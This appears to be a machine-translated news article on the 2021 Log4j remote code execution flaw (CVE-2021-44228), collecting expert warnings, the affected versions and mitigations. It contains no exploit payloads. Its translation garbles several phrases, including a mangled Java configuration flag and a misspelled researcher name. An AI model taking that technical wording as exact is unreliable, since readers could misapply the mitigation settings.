A serious code execution vulnerability in Log4j allowed security experts to warn enterprise organizations and web applications that there could be catastrophic consequences.
The vulnerability is listed as CVE-2021-44228 in the Apache Log4j security vulnerability log, allowing remote attackers to control the affected system.
What is Log4j?
Log4j is an open source Apache logging system framework, which developers use to save records in applications.
This exploitation in the popular Java logging library leads to remote code execution (RCE). The attacker sends a string of malicious code that, when logged by Log4j, allows the attacker to load Java on the server and control it.
wired The report stated that the attacker used Minecraft’s chat feature to exploit the vulnerability on Friday afternoon.
Who is affected by Log4j security issues?
The problem is so serious that the U.S. Cybersecurity and Infrastructure Security Agency issued a notice December 10 This part explains:
“CISA encourages users and administrators to view Apache Log4j 2.15.0 announcement And upgrade to Log4j 2.15.0 or apply the recommended mitigation measures immediately. “
advertise
Keep reading below
The log cited above classifies the severity of the problem as “critical” and describes it as:
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters cannot prevent attackers from controlling LDAP and other JNDI-related endpoints.
When message search and replace is enabled, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from the LDAP server. “
Marcus Hutchins from MalwareTech.com Warning iCloud, Steam and Minecraft have all been confirmed to have vulnerabilities:
This log4j (CVE-2021-44228) vulnerability is very serious. Millions of applications use Log4j for logging, and all an attacker needs to do is make the application log a special string. So far, iCloud, Steam and Minecraft have all confirmed vulnerabilities.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
LunaSec CEO Free Wortley wrote on December 9RCE zero day‘The blog post said, “Anyone who uses Apache Struts can be attacked.”
He also said, “Given the ubiquity of the library, the impact of exploits (full server control) and the ease of exploitation, the impact of this vulnerability is very serious.”
advertise
Keep reading below
CERT, Austrian Computer Emergency Response Team, Issued a warning It was pointed out on Friday that the affected include:
“All Apache log4j versions from 2.0 to 2.14.1 and all frameworks that use these versions (such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.).
According to the security company LunaSec, JDK versions 6u211, 7u201, 8u191, and 11.0.1 are not affected in the default configuration because this does not allow remote code libraries to be loaded.
However, if the option
com.sun.jndi.ldap.object.trustURLCodebaseYestrueSet to, the attack is still possible. “
Rob Joyce, Director of Cyber Security, National Security Agency, Tweet on friday “Because of being widely included in the software framework, even NSA’s GHIDRA, the log4j vulnerability is a major exploit threat.
Security expert advice against Log4j vulnerabilities
Kevin Beaumont warned that even if you have upgraded to log4j-2.15.0-rc1, there is a bypass:
If you have upgraded your code to use the just released log4j-2.15.0-rc1, it is still vulnerable-you now need to apply log4j-2.15.0-rc2 because there is a bypass. They have not been fixed in stable versions.
-Kevin Beaumont (@GossiTheDog) December 10, 2021
Marcus Hutchins from MalwareTech.com Provide solutions for those who cannot upgrade Log4j:
If log4j cannot be upgraded, the RCE vulnerability can be mitigated by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in the JVM command line).
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Matthew Prince, co-founder and CEO of Cloudflare Announced on friday:
“We have made up our mind #Log4J Too bad, we will try to provide at least some protection for everyone Cloud flare Default customers, even free customers without our WAF. We are now studying how to do this safely. “
Chris Wysopal, co-founder and CTO of Veracode, recommends upgrading to at least Java 8:
The patch version of log4j 2.15.0 requires at least Java 8. If you are using Java 7, you need to upgrade to Java 8
When there is an active exploit and you need to quickly patch it, it will be beneficial if you have been updating other dependencies.
— Chris Weissopal (@WeldPond) December 10, 2021
advertise
Keep reading below
He also warned, “Maybe only 5% of applications still use Java 7, but this is the long tail that will be exploited in the coming months. Don’t have one of these in your organization.”
Determining which applications in your organization use Log4j should be a key task.
Featured image: Shutterstock/solarseven
